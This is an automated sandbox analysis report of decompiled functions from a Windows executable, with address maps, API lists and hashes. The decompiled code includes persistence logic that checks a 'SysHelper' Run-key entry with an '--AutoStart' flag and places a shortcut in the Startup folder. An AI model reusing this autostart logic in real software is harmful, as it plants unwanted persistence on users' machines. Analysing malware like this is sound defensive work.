							__eflags =  *0x52923c;
							if( *0x52923c != 0) {
								goto L50;
							} else {
								goto L47;
							}
						} else {
							while(1) {
								__eflags =  *((char*)(_t101 + 0xd));
								if( *((char*)(_t101 + 0xd)) != 0) {
									break;
								}
								_t101 =  *_t101;
								__eflags = _t101 - _t165;
								if(_t101 != _t165) {
									continue;
								} else {
									goto L46;
								}
								goto L51;
							}
							L50:
							_t102 = DefWindowProcW(_a4, 0x8003, _a12, _a16);
							 *[fs:0x0] = _v16;
							return _t102;
						}
					} else {
						__eflags = _t100 == 1;
						if(_t100 == 1) {
							_v2408 = 0x400;
							_t205 = E00420C62(_t158, _t187, _t191, 0x800);
							GetComputerNameW(_t107,  &_v2408);
							_v2412 = 7;
							_v2416 = 0;
							_v2432 = 0;
							_v8 = 0;
							_t111 = E00413100( &_v2348, _t191, L"\\\\");
							_v12 = 1;
							_t194 = E0041CE80( &_v2376, _t111, _t205);
							_t215 = _t213 + 8;
							__eflags =  &_v2436 - _t194;
							if( &_v2436 != _t194) {
								__eflags = 0;
								_v2412 = 7;
								_v2416 = 0;
								_v2432 = 0;
								E004145A0( &_v2432, _t194);
							}
							__eflags = _v2352 - 8;
							if(_v2352 >= 8) {
								L00422587(_v2372);
								_t215 = _t215 + 4;
							}
							_v2352 = 7;
							_v8 = 0;
							__eflags = _v2328 - 8;
							_v2356 = 0;
							_v2372 = 0;
							if(_v2328 >= 8) {
								L00422587(_v2348);
								_t215 = _t215 + 4;
							}
							_v2328 = 7;
							_v2332 = 0;
							_v2348 = 0;
							E00420BED(_t205);
							_t206 =  *0x529240; // 0x0
							_t170 = 0;
							_t216 = _t215 + 4;
							_v2440 = 0;
							__eflags = _t206 -  *0x529244; // 0x0
							if(__eflags == 0) {
								L37:
								_t195 = _a4;
								_t208 =  *((intOrPtr*)( *0x513268));
								_t117 = IsWindow(_t195);
								__eflags = _t117;
								if(_t117 != 0) {
									__eflags =  *(_t208 + 0x8c8);
									if( *(_t208 + 0x8c8) <= 0) {
										 *0x529224 = 1;
										DestroyWindow(_t195);
									}
								}
							} else {
								_t40 = _t206 + 0x28; // 0x28
								_t161 = _t40;
								do {
									__eflags =  *((intOrPtr*)(_t161 - 0x24)) - 1;
									if( *((intOrPtr*)(_t161 - 0x24)) == 1) {
										__eflags =  *((intOrPtr*)(_t161 - 0x20)) - 3;
										if( *((intOrPtr*)(_t161 - 0x20)) == 3) {
											_t218 = _t216 - 0x18;
											_t171 = _t218;
											_v2436 = _t218;
											_push(0xffffffff);
											 *((intOrPtr*)(_t171 + 0x14)) = 7;
											 *(_t171 + 0x10) = 0;
											_push(0);
											 *_t171 = 0;
											E00414690(_t161, _t171,  &_v2432);
											_t219 = _t218 - 0x18;
											_v20 = 2;
											_t172 = _t219;
											_push(0xffffffff);
											_push(0);
											 *((intOrPtr*)(_t172 + 0x14)) = 7;
											 *(_t172 + 0x10) = 0;
											 *_t172 = 0;
											E00414690(_t161, _t172, _t161);
											_v32 = 0;
											_t125 = E0040EFF0(0);
											_t216 = _t219 + 0x30;
											__eflags = _t125 - 0xffffffff;
											if(_t125 != 0xffffffff) {
												_t170 = _v2456;
											} else {
												_v2396 = 0;
												_v2392 = 0;
												E0041C330(_t194, _t206,  &_v2396);
												_t128 = E00419D10( &_v2316);
												_v28 = 3;
												E0041C240(_t194, _t206, _t128);
												_v32 = 0;
												E0041B680( &_v2320);
												_t176 =  *0x513268;
												_t131 =  *_t176;
												_t197 =  *((intOrPtr*)(_t176 + 4)) + 8;
												_v2460 =  *((intOrPtr*)(_t176 + 4)) + 8;
												 *((intOrPtr*)(_t131 + 0x8c8)) =  *((intOrPtr*)( *_t176 + 0x8c8)) + 1;
												E0041B8B0(_t161, _t197, _t131 + 8);
												_v2412 = 7;
												_push(0xffffffff);
												_push(0);
												_v2416 = 0;
												_v2432 = 0;
												E00414690(_t161,  &_v2432, _t161);
												_v48 = 4;
												_t136 = E0041CE80( &_v2364,  &_v2444, "\\");
												_t216 = _t216 + 4;
												E004131D0(_t197 + 0x8a4, _t136);
												__eflags = _v2348 - 8;
												if(_v2348 >= 8) {
													L00422587(_v2348);
													_t216 = _t216 + 4;
												}
												_v2328 = 7;
												_v32 = 0;
												__eflags = _v2408 - 8;
												_v2332 = 0;
												_v2348 = 0;
												if(_v2408 >= 8) {
													L00422587(_v2428);
													_t216 = _t216 + 4;
												}
												_v2408 = 7;
												_v2428 = 0;
												_t140 =  *0x529228; // 0x7dd0b8
												_v2412 = 0;
												_t194 =  *((intOrPtr*)(_t140 + 4)) + 8;
												_t141 = CreateThread(0, 0, E0041F130, _v2460, 0, _t194);
												__eflags = _t141;
												_t194[1] = _t141;
												_t170 =  !=  ? 1 : _v2468 & 0x000000ff;
												_v2468 = _t170;
											}
										}
									}
									_t206 = _t206 + 0x70;
									_t161 = _t161 + 0x70;
									__eflags = _t206 -  *0x529244; // 0x0
								} while (__eflags != 0);
								__eflags = _t170;
								if(_t170 == 0) {
									goto L37;
								}
							}
							__eflags = _v2412 - 8;
							if(_v2412 >= 8) {
								L00422587(_v2432);
							}
							goto L49;
						} else {
							goto L15;
						}
					}
				} else {
					if(_t221 == 0) {
						_t185 =  *0x513268;
						_t151 =  *_t185;
						__eflags = _t151 - _t185;
						if(_t151 == _t185) {
							goto L49;
						} else {
							while(1) {
								__eflags =  *((char*)(_t151 + 0xd));
								if( *((char*)(_t151 + 0xd)) != 0) {
									_t152 = DefWindowProcW(_a4, 0x8001, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t152;
								}
								_t151 =  *_t151;
								__eflags = _t151 - _t185;
								if(_t151 != _t185) {
									continue;
								} else {
									goto L49;
								}
								goto L51;
							}
						}
					} else {
						_t154 = _t164 - 2;
						if(_t154 == 0) {
							PostQuitMessage(0);
							L49:
							 *[fs:0x0] = _v16;
							return 0;
						} else {
							_t155 = _t154 - 0xf;
							if(_t155 == 0) {
								goto L49;
							} else {
								_t156 = _t155 - 5;
								if(_t156 != 0) {
									L15:
									_t150 = DefWindowProcW(_a4, _t164, _a12, _a16);
									 *[fs:0x0] = _v16;
									return _t150;
								} else {
									if(_a12 != _t156) {
										E00411CD0(_t158, 0, _t156);
										L47:
										_t203 = _a4;
										if(IsWindow(_t203) != 0) {
											 *0x529224 = 1;
											DestroyWindow(_t203);
										}
									}
									goto L49;
								}
							}
						}
					}
				}
				L51:
			}

0x0041bae3
0x0041baec
0x0041baef
0x0041baf1
0x0041baf6
0x0041baf7
0x0041bafe
0x0041bb04
0x0041bb06
0x0041bb07
0x0041bb0d
0x0041bba2
0x0041bba2
0x0041bba7
0x0041bf3d
0x0041bf43
0x0041bf45
0x0041bf47
0x0041bf5c
0x0041bf5c
0x0041bf63
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf50
0x0041bf50
0x0041bf50
0x0041bf54
0x00000000
0x00000000
0x0041bf56
0x0041bf58
0x0041bf5a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bf5a
0x0041bf9a
0x0041bfa8
0x0041bfb7
0x0041bfc2
0x0041bfc2
0x0041bbad
0x0041bbad
0x0041bbae
0x0041bbdc
0x0041bbec
0x0041bbf4
0x0041bbfc
0x0041bc04
0x0041bc0c
0x0041bc1a
0x0041bc21
0x0041bc29
0x0041bc3a
0x0041bc3c
0x0041bc43
0x0041bc45
0x0041bc5a
0x0041bc5c
0x0041bc69
0x0041bc71
0x0041bc76
0x0041bc76
0x0041bc7b
0x0041bc80
0x0041bc86
0x0041bc8b
0x0041bc8b
0x0041bc90
0x0041bc98
0x0041bc9f
0x0041bca4
0x0041bcac
0x0041bcb1
0x0041bcb7
0x0041bcbc
0x0041bcbc
0x0041bcc1
0x0041bcca
0x0041bcd2
0x0041bcd7
0x0041bcdc
0x0041bce2
0x0041bce4
0x0041bce7
0x0041bceb
0x0041bcf1
0x0041befb
0x0041bf01
0x0041bf05
0x0041bf07
0x0041bf0d
0x0041bf0f
0x0041bf11
0x0041bf18
0x0041bf1b
0x0041bf22
0x0041bf22
0x0041bf18
0x0041bcf7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd00
0x0041bd04
0x0041bd0a
0x0041bd0e
0x0041bd14
0x0041bd19
0x0041bd1b
0x0041bd1f
0x0041bd21
0x0041bd28
0x0041bd2f
0x0041bd30
0x0041bd38
0x0041bd3d
0x0041bd40
0x0041bd48
0x0041bd4c
0x0041bd4e
0x0041bd4f
0x0041bd56
0x0041bd5e
0x0041bd61
0x0041bd68
0x0041bd70
0x0041bd75
0x0041bd78
0x0041bd7b
0x0041bee1
0x0041bd81
0x0041bd85
0x0041bd8e
0x0041bd96
0x0041bda2
0x0041bda8
0x0041bdb0
0x0041bdbc
0x0041bdc4
0x0041bdc9
0x0041bdcf
0x0041bdd4
0x0041bdd9
0x0041bddd
0x0041bde7
0x0041bdee
0x0041bdf6
0x0041bdf8
0x0041bdfe
0x0041be06
0x0041be0b
0x0041be19
0x0041be28
0x0041be2d
0x0041be37
0x0041be3c
0x0041be44
0x0041be4d
0x0041be52
0x0041be52
0x0041be57
0x0041be62
0x0041be69
0x0041be6e
0x0041be79
0x0041be81
0x0041be87
0x0041be8c
0x0041be8c
0x0041be91
0x0041be99
0x0041be9e
0x0041bea3
0x0041beae
0x0041bec1
0x0041becb
0x0041becd
0x0041bed8
0x0041bedb
0x0041bedb
0x0041bd7b
0x0041bd0e
0x0041bee5
0x0041bee8
0x0041beeb
0x0041beeb
0x0041bef7
0x0041bef9
0x00000000
0x00000000
0x0041bef9
0x0041bf28
0x0041bf2d
0x0041bf33
0x0041bf38
0x00000000
0x00000000
0x00000000
0x00000000
0x0041bbae
0x0041bb13
0x0041bb13
0x0041bb54
0x0041bb5a
0x0041bb5c
0x0041bb5e
0x00000000
0x00000000
0x0041bb64
0x0041bb64
0x0041bb68
0x0041bb83
0x0041bb90
0x0041bb9d
0x0041bb9d
0x0041bb6a
0x0041bb6c
0x0041bb6e
0x00000000
0x0041bb70
0x00000000
0x0041bb70
0x00000000
0x0041bb6e
0x0041bb64
0x0041bb15
0x0041bb17
0x0041bb1a
0x0041bb49
0x0041bf81
0x0041bf8a
0x0041bf97
0x0041bb1c
0x0041bb1c
0x0041bb1f
0x00000000
0x0041bb25
0x0041bb25
0x0041bb28
0x0041bbb0
0x0041bbba
0x0041bbc7
0x0041bbd4
0x0041bb2e
0x0041bb31
0x0041bb3a
0x0041bf65
0x0041bf65
0x0041bf71
0x0041bf74
0x0041bf7b
0x0041bf7b
0x0041bf71
0x00000000
0x0041bb31
0x0041bb28
0x0041bb1f
0x0041bb1a
0x0041bb13
0x00000000

APIs

PostQuitMessage.USER32(00000000), ref: 0041BB49
DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
_malloc.LIBCMT ref: 0041BBE4
GetComputerNameW.KERNEL32 ref: 0041BBF4
_free.LIBCMT ref: 0041BCD7

Part of subcall function 00411CD0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
Part of subcall function 00411CD0: RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48

IsWindow.USER32(?), ref: 0041BF69
DestroyWindow.USER32(?), ref: 0041BF7B
DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
String ID:
API String ID: 3873257347-0
Opcode ID: 0b6cd30969b5d411eadf025deff3bbc7c1f002c9bd123bdd83f599d5ca36c104
Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
Opcode Fuzzy Hash: 0b6cd30969b5d411eadf025deff3bbc7c1f002c9bd123bdd83f599d5ca36c104
Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00425B6E Relevance: 18.1, APIs: 12, Instructions: 131
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E00425B6E(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, char _a12) {
				signed int _v8;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _t38;
				signed int _t45;
				signed int _t60;
				intOrPtr _t77;
				void* _t80;
				intOrPtr* _t82;
				signed int _t83;
				signed int _t86;
				intOrPtr _t88;
				void* _t92;

				_t80 = __edx;
				_push(__ebx);
				_push(__esi);
				_t86 = 0;
				if(_a12 <= 0) {
					L5:
					return _t38;
				} else {
					_push(__edi);
					_t82 =  &_a12;
					while(1) {
						_t82 = _t82 + 4;
						_t38 = E004295C3(_a4, _a8,  *_t82);
						_t92 = _t92 + 0xc;
						if(_t38 != 0) {
							break;
						}
						_t86 = _t86 + 1;
						if(_t86 < _a12) {
							continue;
						} else {
							goto L5;
						}
						goto L20;
					}
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E004242FD(0, _t80);
					asm("int3");
					_push(0x14);
					_push(0x507ab0);
					E00428520(0, _t82, _t86);
					_t66 = 0;
					_v32 = 0;
					__eflags = _a4 - 5;
					if(__eflags <= 0) {
						_t88 = E00425007();
						_v36 = _t88;
						E004245DC(0, _t82, _t88, __eflags);
						 *(_t88 + 0x70) =  *(_t88 + 0x70) | 0x00000010;
						_v8 = _v8 & 0;
						_t83 = E00428C96(0xb8, 1);
						_v40 = _t83;
						__eflags = _t83;
						if(_t83 != 0) {
							E00428AF7(0xc);
							_v8 = 1;
							E004255AC(_t83,  *((intOrPtr*)(_t88 + 0x6c)));
							_v8 = _v8 & 0x00000000;
							E00425CE3();
							_t66 = E00425E97(0, _t80, _t83, _t88, _t83, _a4, _a8);
							_v32 = _t66;
							__eflags = _t66;
							if(_t66 == 0) {
								E0042453C(_t83);
								_t43 = E004243E2(_t83);
							} else {
								__eflags = _a8;
								if(_a8 != 0) {
									_t60 = E00437413(_a8, 0x50a97c);
									__eflags = _t60;
									if(_t60 != 0) {
										 *0x510434 = 1;
									}
								}
								E00428AF7(0xc);
								_v8 = 2;
								_t25 = _t88 + 0x6c; // 0x6c
								E0042465C(_t25, _t83);
								E0042453C(_t83);
								__eflags =  *(_t88 + 0x70) & 0x00000002;
								if(( *(_t88 + 0x70) & 0x00000002) == 0) {
									__eflags =  *0x50aba8 & 0x00000001;
									if(( *0x50aba8 & 0x00000001) == 0) {
										E0042465C(0x50aae4,  *((intOrPtr*)(_t88 + 0x6c)));
										_t77 =  *0x50aae4; // 0x50aae8
										_t32 = _t77 + 0x84; // 0x50b030
										 *0x50b028 =  *_t32;
										_t33 = _t77 + 0x90; // 0x4d0da8
										 *0x50b084 =  *_t33;
										_t34 = _t77 + 0x74; // 0x1
										 *0x50a978 =  *_t34;
									}
								}
								_v8 = _v8 & 0x00000000;
								_t43 = E00425CF2();
							}
						}
						_v8 = 0xfffffffe;
						E00425D25(_t43, _t88);
						_t45 = _t66;
					} else {
						 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
						E004242D2();
						_t45 = 0;
					}
					return E00428565(_t45);
				}
				L20:
			}

0x00425b6e
0x00425b71
0x00425b74
0x00425b75
0x00425b7a
0x00425b9e
0x00425ba1
0x00425b7c
0x00425b7c
0x00425b7d
0x00425b80
0x00425b80
0x00425b8b
0x00425b90
0x00425b95
0x00000000
0x00000000
0x00425b97
0x00425b9b
0x00000000
0x00425b9d
0x00000000
0x00425b9d
0x00000000
0x00425b9b
0x00425ba2
0x00425ba3
0x00425ba4
0x00425ba5
0x00425ba6
0x00425ba7
0x00425bac
0x00425bad
0x00425baf
0x00425bb4
0x00425bb9
0x00425bbb
0x00425bbe
0x00425bc2
0x00425be0
0x00425be2
0x00425be5
0x00425bea
0x00425bee
0x00425bff
0x00425c01
0x00425c04
0x00425c06
0x00425c0e
0x00425c14
0x00425c1f
0x00425c26
0x00425c2a
0x00425c3e
0x00425c40
0x00425c43
0x00425c45
0x00425cfe
0x00425d04
0x00425c4b
0x00425c4b
0x00425c4f
0x00425c59
0x00425c60
0x00425c62
0x00425c64
0x00425c64
0x00425c62
0x00425c70
0x00425c76
0x00425c7d
0x00425c82
0x00425c88
0x00425c90
0x00425c94
0x00425c96
0x00425c9d
0x00425ca7
0x00425cae
0x00425cb4
0x00425cba
0x00425cbf
0x00425cc5
0x00425cca
0x00425ccd
0x00425ccd
0x00425c9d
0x00425cd2
0x00425cd6
0x00425cd6
0x00425c45
0x00425d0b
0x00425d12
0x00425d17
0x00425bc4
0x00425bc9
0x00425bcf
0x00425bd4
0x00425bd4
0x00425d1e
0x00425d1e
0x00000000

APIs

__invoke_watson.LIBCMT ref: 00425BA7
__calloc_crt.LIBCMT ref: 00425BF8
__lock.LIBCMT ref: 00425C0E
__copytlocinfo_nolock.LIBCMT ref: 00425C1F
__wsetlocale_nolock.LIBCMT ref: 00425C36
_wcscmp.LIBCMT ref: 00425C59
__lock.LIBCMT ref: 00425C70
__updatetlocinfoEx_nolock.LIBCMT ref: 00425C82
___removelocaleref.LIBCMT ref: 00425C88
__updatetlocinfoEx_nolock.LIBCMT ref: 00425CA7

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson__wsetlocale_nolock_wcscmp
String ID:
API String ID: 2762079118-0
Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction ID: 0fe30f67420a0b57e0336c9221d2143c2ac41a82f10de3dc78134a272e9def7d
Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
Instruction Fuzzy Hash: BE412932700724AFDB11AFA6B886B9E7BE0EF44318F90802FF51496282DB7D9544DB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00411B90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110
stringcomCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00411B90(void* __ecx, WCHAR* __edx, void* _a4) {
				void* _v8;
				void* _v12;
				struct _ITEMIDLIST* _v16;
				char _v20;
				short _v532;
				char* _t30;
				intOrPtr* _t34;
				intOrPtr* _t35;
				intOrPtr* _t43;
				intOrPtr* _t48;
				intOrPtr* _t49;
				void* _t50;
				WCHAR* _t51;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t67;
				void* _t70;

				_t51 = __edx;
				_v8 = 0;
				_v12 = 0;
				__imp__CoInitialize(0, _t67, _t70, _t50);
				_t30 =  &_v8;
				__imp__CoCreateInstance(0x4ce908, 0, 1, 0x4cd568, _t30);
				__imp__CoUninitialize();
				if(_t30 >= 0) {
					_t34 = _v8;
					_t30 =  *((intOrPtr*)( *_t34))(_t34, 0x4cf2e8,  &_v12);
					if(_t30 >= 0) {
						_t35 = _v8;
						_t30 =  *((intOrPtr*)( *_t35 + 0x50))(_t35, __ecx);
						if(_t30 >= 0) {
							SHGetSpecialFolderLocation(_a4, 7,  &_v16);
							__imp__SHGetPathFromIDListW(_v16,  &_v532);
							lstrcatW( &_v532, "\\");
							lstrcatW( &_v532, _t51);
							_t43 = _v12;
							_t30 =  *((intOrPtr*)( *_t43 + 0x18))(_t43,  &_v532, 1);
							if(_t30 >= 0) {
								GetSystemDirectoryW( &_v532, 0x100);
								lstrcatW( &_v532, L"\\shell32.dll");
								_t48 = _v8;
								_t30 =  *((intOrPtr*)( *_t48 + 0x44))(_t48,  &_v532, 1);
								if(_t30 >= 0) {
									_t49 = _v8;
									_t30 =  *((intOrPtr*)( *_t49 + 0x40))(_t49,  &_v532, 0x100,  &_v20);
								}
							}
						}
					}
				}
				_t54 = _v12;
				if(_t54 != 0) {
					_t30 =  *((intOrPtr*)( *_t54 + 8))(_t54);
				}
				_t55 = _v8;
				if(_t55 == 0) {
					return _t30;
				} else {
					return  *((intOrPtr*)( *_t55 + 8))(_t55);
				}
			}

0x00411b9e
0x00411ba0
0x00411ba9
0x00411bb0
0x00411bb6
0x00411bc8
0x00411bd0
0x00411bd8
0x00411bde
0x00411bed
0x00411bf1
0x00411bf7
0x00411bfe
0x00411c03
0x00411c12
0x00411c22
0x00411c3a
0x00411c44
0x00411c46
0x00411c55
0x00411c5a
0x00411c68
0x00411c7a
0x00411c7c
0x00411c8b
0x00411c90
0x00411c92
0x00411ca8
0x00411ca8
0x00411c90
0x00411c5a
0x00411c03
0x00411bf1
0x00411cab
0x00411cb3
0x00411cb8
0x00411cb8
0x00411cbb
0x00411cc0
0x00411ccb
0x00411cc2
0x00000000
0x00411cc5

APIs

CoInitialize.OLE32(00000000), ref: 00411BB0
CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
CoUninitialize.OLE32 ref: 00411BD0
SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
lstrcatW.KERNEL32(?), ref: 00411C44
GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A

Strings

\shell32.dll, xrefs: 00411C6E

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
String ID: \shell32.dll
API String ID: 679253221-3783449302
Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54

Uniqueness

Uniqueness Score: -1.00%

Function 004549A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E004549A0(void* __ebx) {
				signed int _v8;
				long _v12;
				void* _v16;
				void* _v24;
				void* __edi;
				void* __esi;
				signed int _t21;
				CHAR* _t23;
				void* _t31;
				unsigned int _t34;
				struct HINSTANCE__* _t42;
				void* _t43;
				void* _t52;
				void* _t54;
				void* _t55;
				long _t56;
				signed int _t58;
				void* _t59;

				_t43 = __ebx;
				E0042F7C0(0xc);
				_t21 =  *0x50ad20; // 0x727261cc
				_v8 = _t21 ^ _t58;
				_t23 =  *0x512a94;
				if(_t23 != 0) {
					L12:
					if(_t23 == 0xffffffff) {
						goto L6;
					} else {
						 *_t23();
						return E0042A77E(_t43, _v8 ^ _t58, _t52, _t54, _t56);
					}
				} else {
					_t42 = GetModuleHandleA(_t23);
					if(_t42 == 0) {
						_t23 =  *0x512a94;
					} else {
						_t23 = GetProcAddress(_t42, "_OPENSSL_isservice");
						 *0x512a94 = _t23;
					}
					if(_t23 != 0) {
						goto L12;
					} else {
						 *0x512a94 = 0xffffffff;
						L6:
						GetDesktopWindow();
						_t55 = GetProcessWindowStation();
						if(_t55 == 0 || GetUserObjectInformationW(_t55, 2, 0, 0,  &_v12) != 0 || GetLastError() != 0x7a) {
							L14:
							return E0042A77E(_t43, _v8 ^ _t58, _t52, _t55, _t56);
						} else {
							_t56 = _v12;
							if(_t56 > 0x200) {
								goto L14;
							} else {
								_t56 = _t56 + 0x00000001 & 0xfffffffe;
								E0043F980(_t56 + 2, _t56);
								_t31 = _t59;
								_v16 = _t31;
								if(GetUserObjectInformationW(_t55, 2, _t31, _t56,  &_v12) == 0) {
									goto L14;
								} else {
									_t47 = _v16;
									_t34 = _v12 + 0x00000001 & 0xfffffffe;
									_v12 = _t34;
									_push(L"Service-0x");
									 *((short*)(_v16 + (_t34 >> 1) * 2)) = 0;
									E00421C02(_v16);
									asm("sbb eax, eax");
									return E0042A77E(_t43, _v8 ^ _t58, 0, _t55, _t56, _t47);
								}
							}
						}
					}
				}
			}

0x004549a0
0x004549a8
0x004549ad
0x004549b4
0x004549b7
0x004549c0
0x00454aab
0x00454aae
0x00000000
0x00454ab4
0x00454ab4
0x00454ac8
0x00454ac8
0x004549c6
0x004549c7
0x004549cf
0x004549e4
0x004549d1
0x004549d7
0x004549dd
0x004549dd
0x004549eb
0x00000000
0x004549f1
0x004549f1
0x004549fb
0x004549fb
0x00454a07
0x00454a0b
0x00454ac9
0x00454ade
0x00454a39
0x00454a39
0x00454a42
0x00000000
0x00454a48
0x00454a49
0x00454a52
0x00454a57
0x00454a62
0x00454a6d
0x00000000
0x00454a6f
0x00454a74
0x00454a78
0x00454a7b
0x00454a80
0x00454a86
0x00454a8a
0x00454a94
0x00454aaa
0x00454aaa
0x00454a6d
0x00454a42
0x00454a0b
0x004549eb

APIs

GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
GetDesktopWindow.USER32 ref: 004549FB
GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
_wcsstr.LIBCMT ref: 00454A8A

Strings

Service-0x, xrefs: 00454A80
_OPENSSL_isservice, xrefs: 004549D1

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
String ID: Service-0x$_OPENSSL_isservice
API String ID: 2112994598-1672312481
Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58

Uniqueness

Uniqueness Score: -1.00%

Function 00454AE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 75
registrywindowCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 91%

			E00454AE0(void* __ebx, void* __edx, void* __edi, void* __esi, char _a4, char _a259, signed int _a260, wchar_t* _a268, void _a272) {
				CHAR* _v0;
				signed int _t17;
				void* _t19;
				void* _t46;
				void* _t49;
				void* _t50;
				signed int _t51;
				signed int _t52;

				_t48 = __esi;
				_t47 = __edi;
				_t46 = __edx;
				_t39 = __ebx;
				E0042F7C0(0x108);
				_t17 =  *0x50ad20; // 0x727261cc
				_a260 = _t17 ^ _t51;
				_t19 = GetStdHandle(0xfffffff4);
				if(_t19 == 0 || GetFileType(_t19) == 0) {
					vswprintf( &_a4, 0xff, _a268,  &_a272);
					_t52 = _t51 + 0x10;
					_a259 = 0;
					if(E004549A0(_t39) <= 0) {
						MessageBoxA(0,  &_a4, "OpenSSL: FATAL", 0x10);
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t48);
					} else {
						_t49 = RegisterEventSourceA(0, "OPENSSL");
						_v0 =  &_a4;
						ReportEventA(_t49, 1, 0, 0, 0, 1, 0,  &_v0, 0);
						DeregisterEventSource(_t49);
						_t50 = _t48;
						return E0042A77E(_t39, _a260 ^ _t52, _t46, _t47, _t50);
					}
				} else {
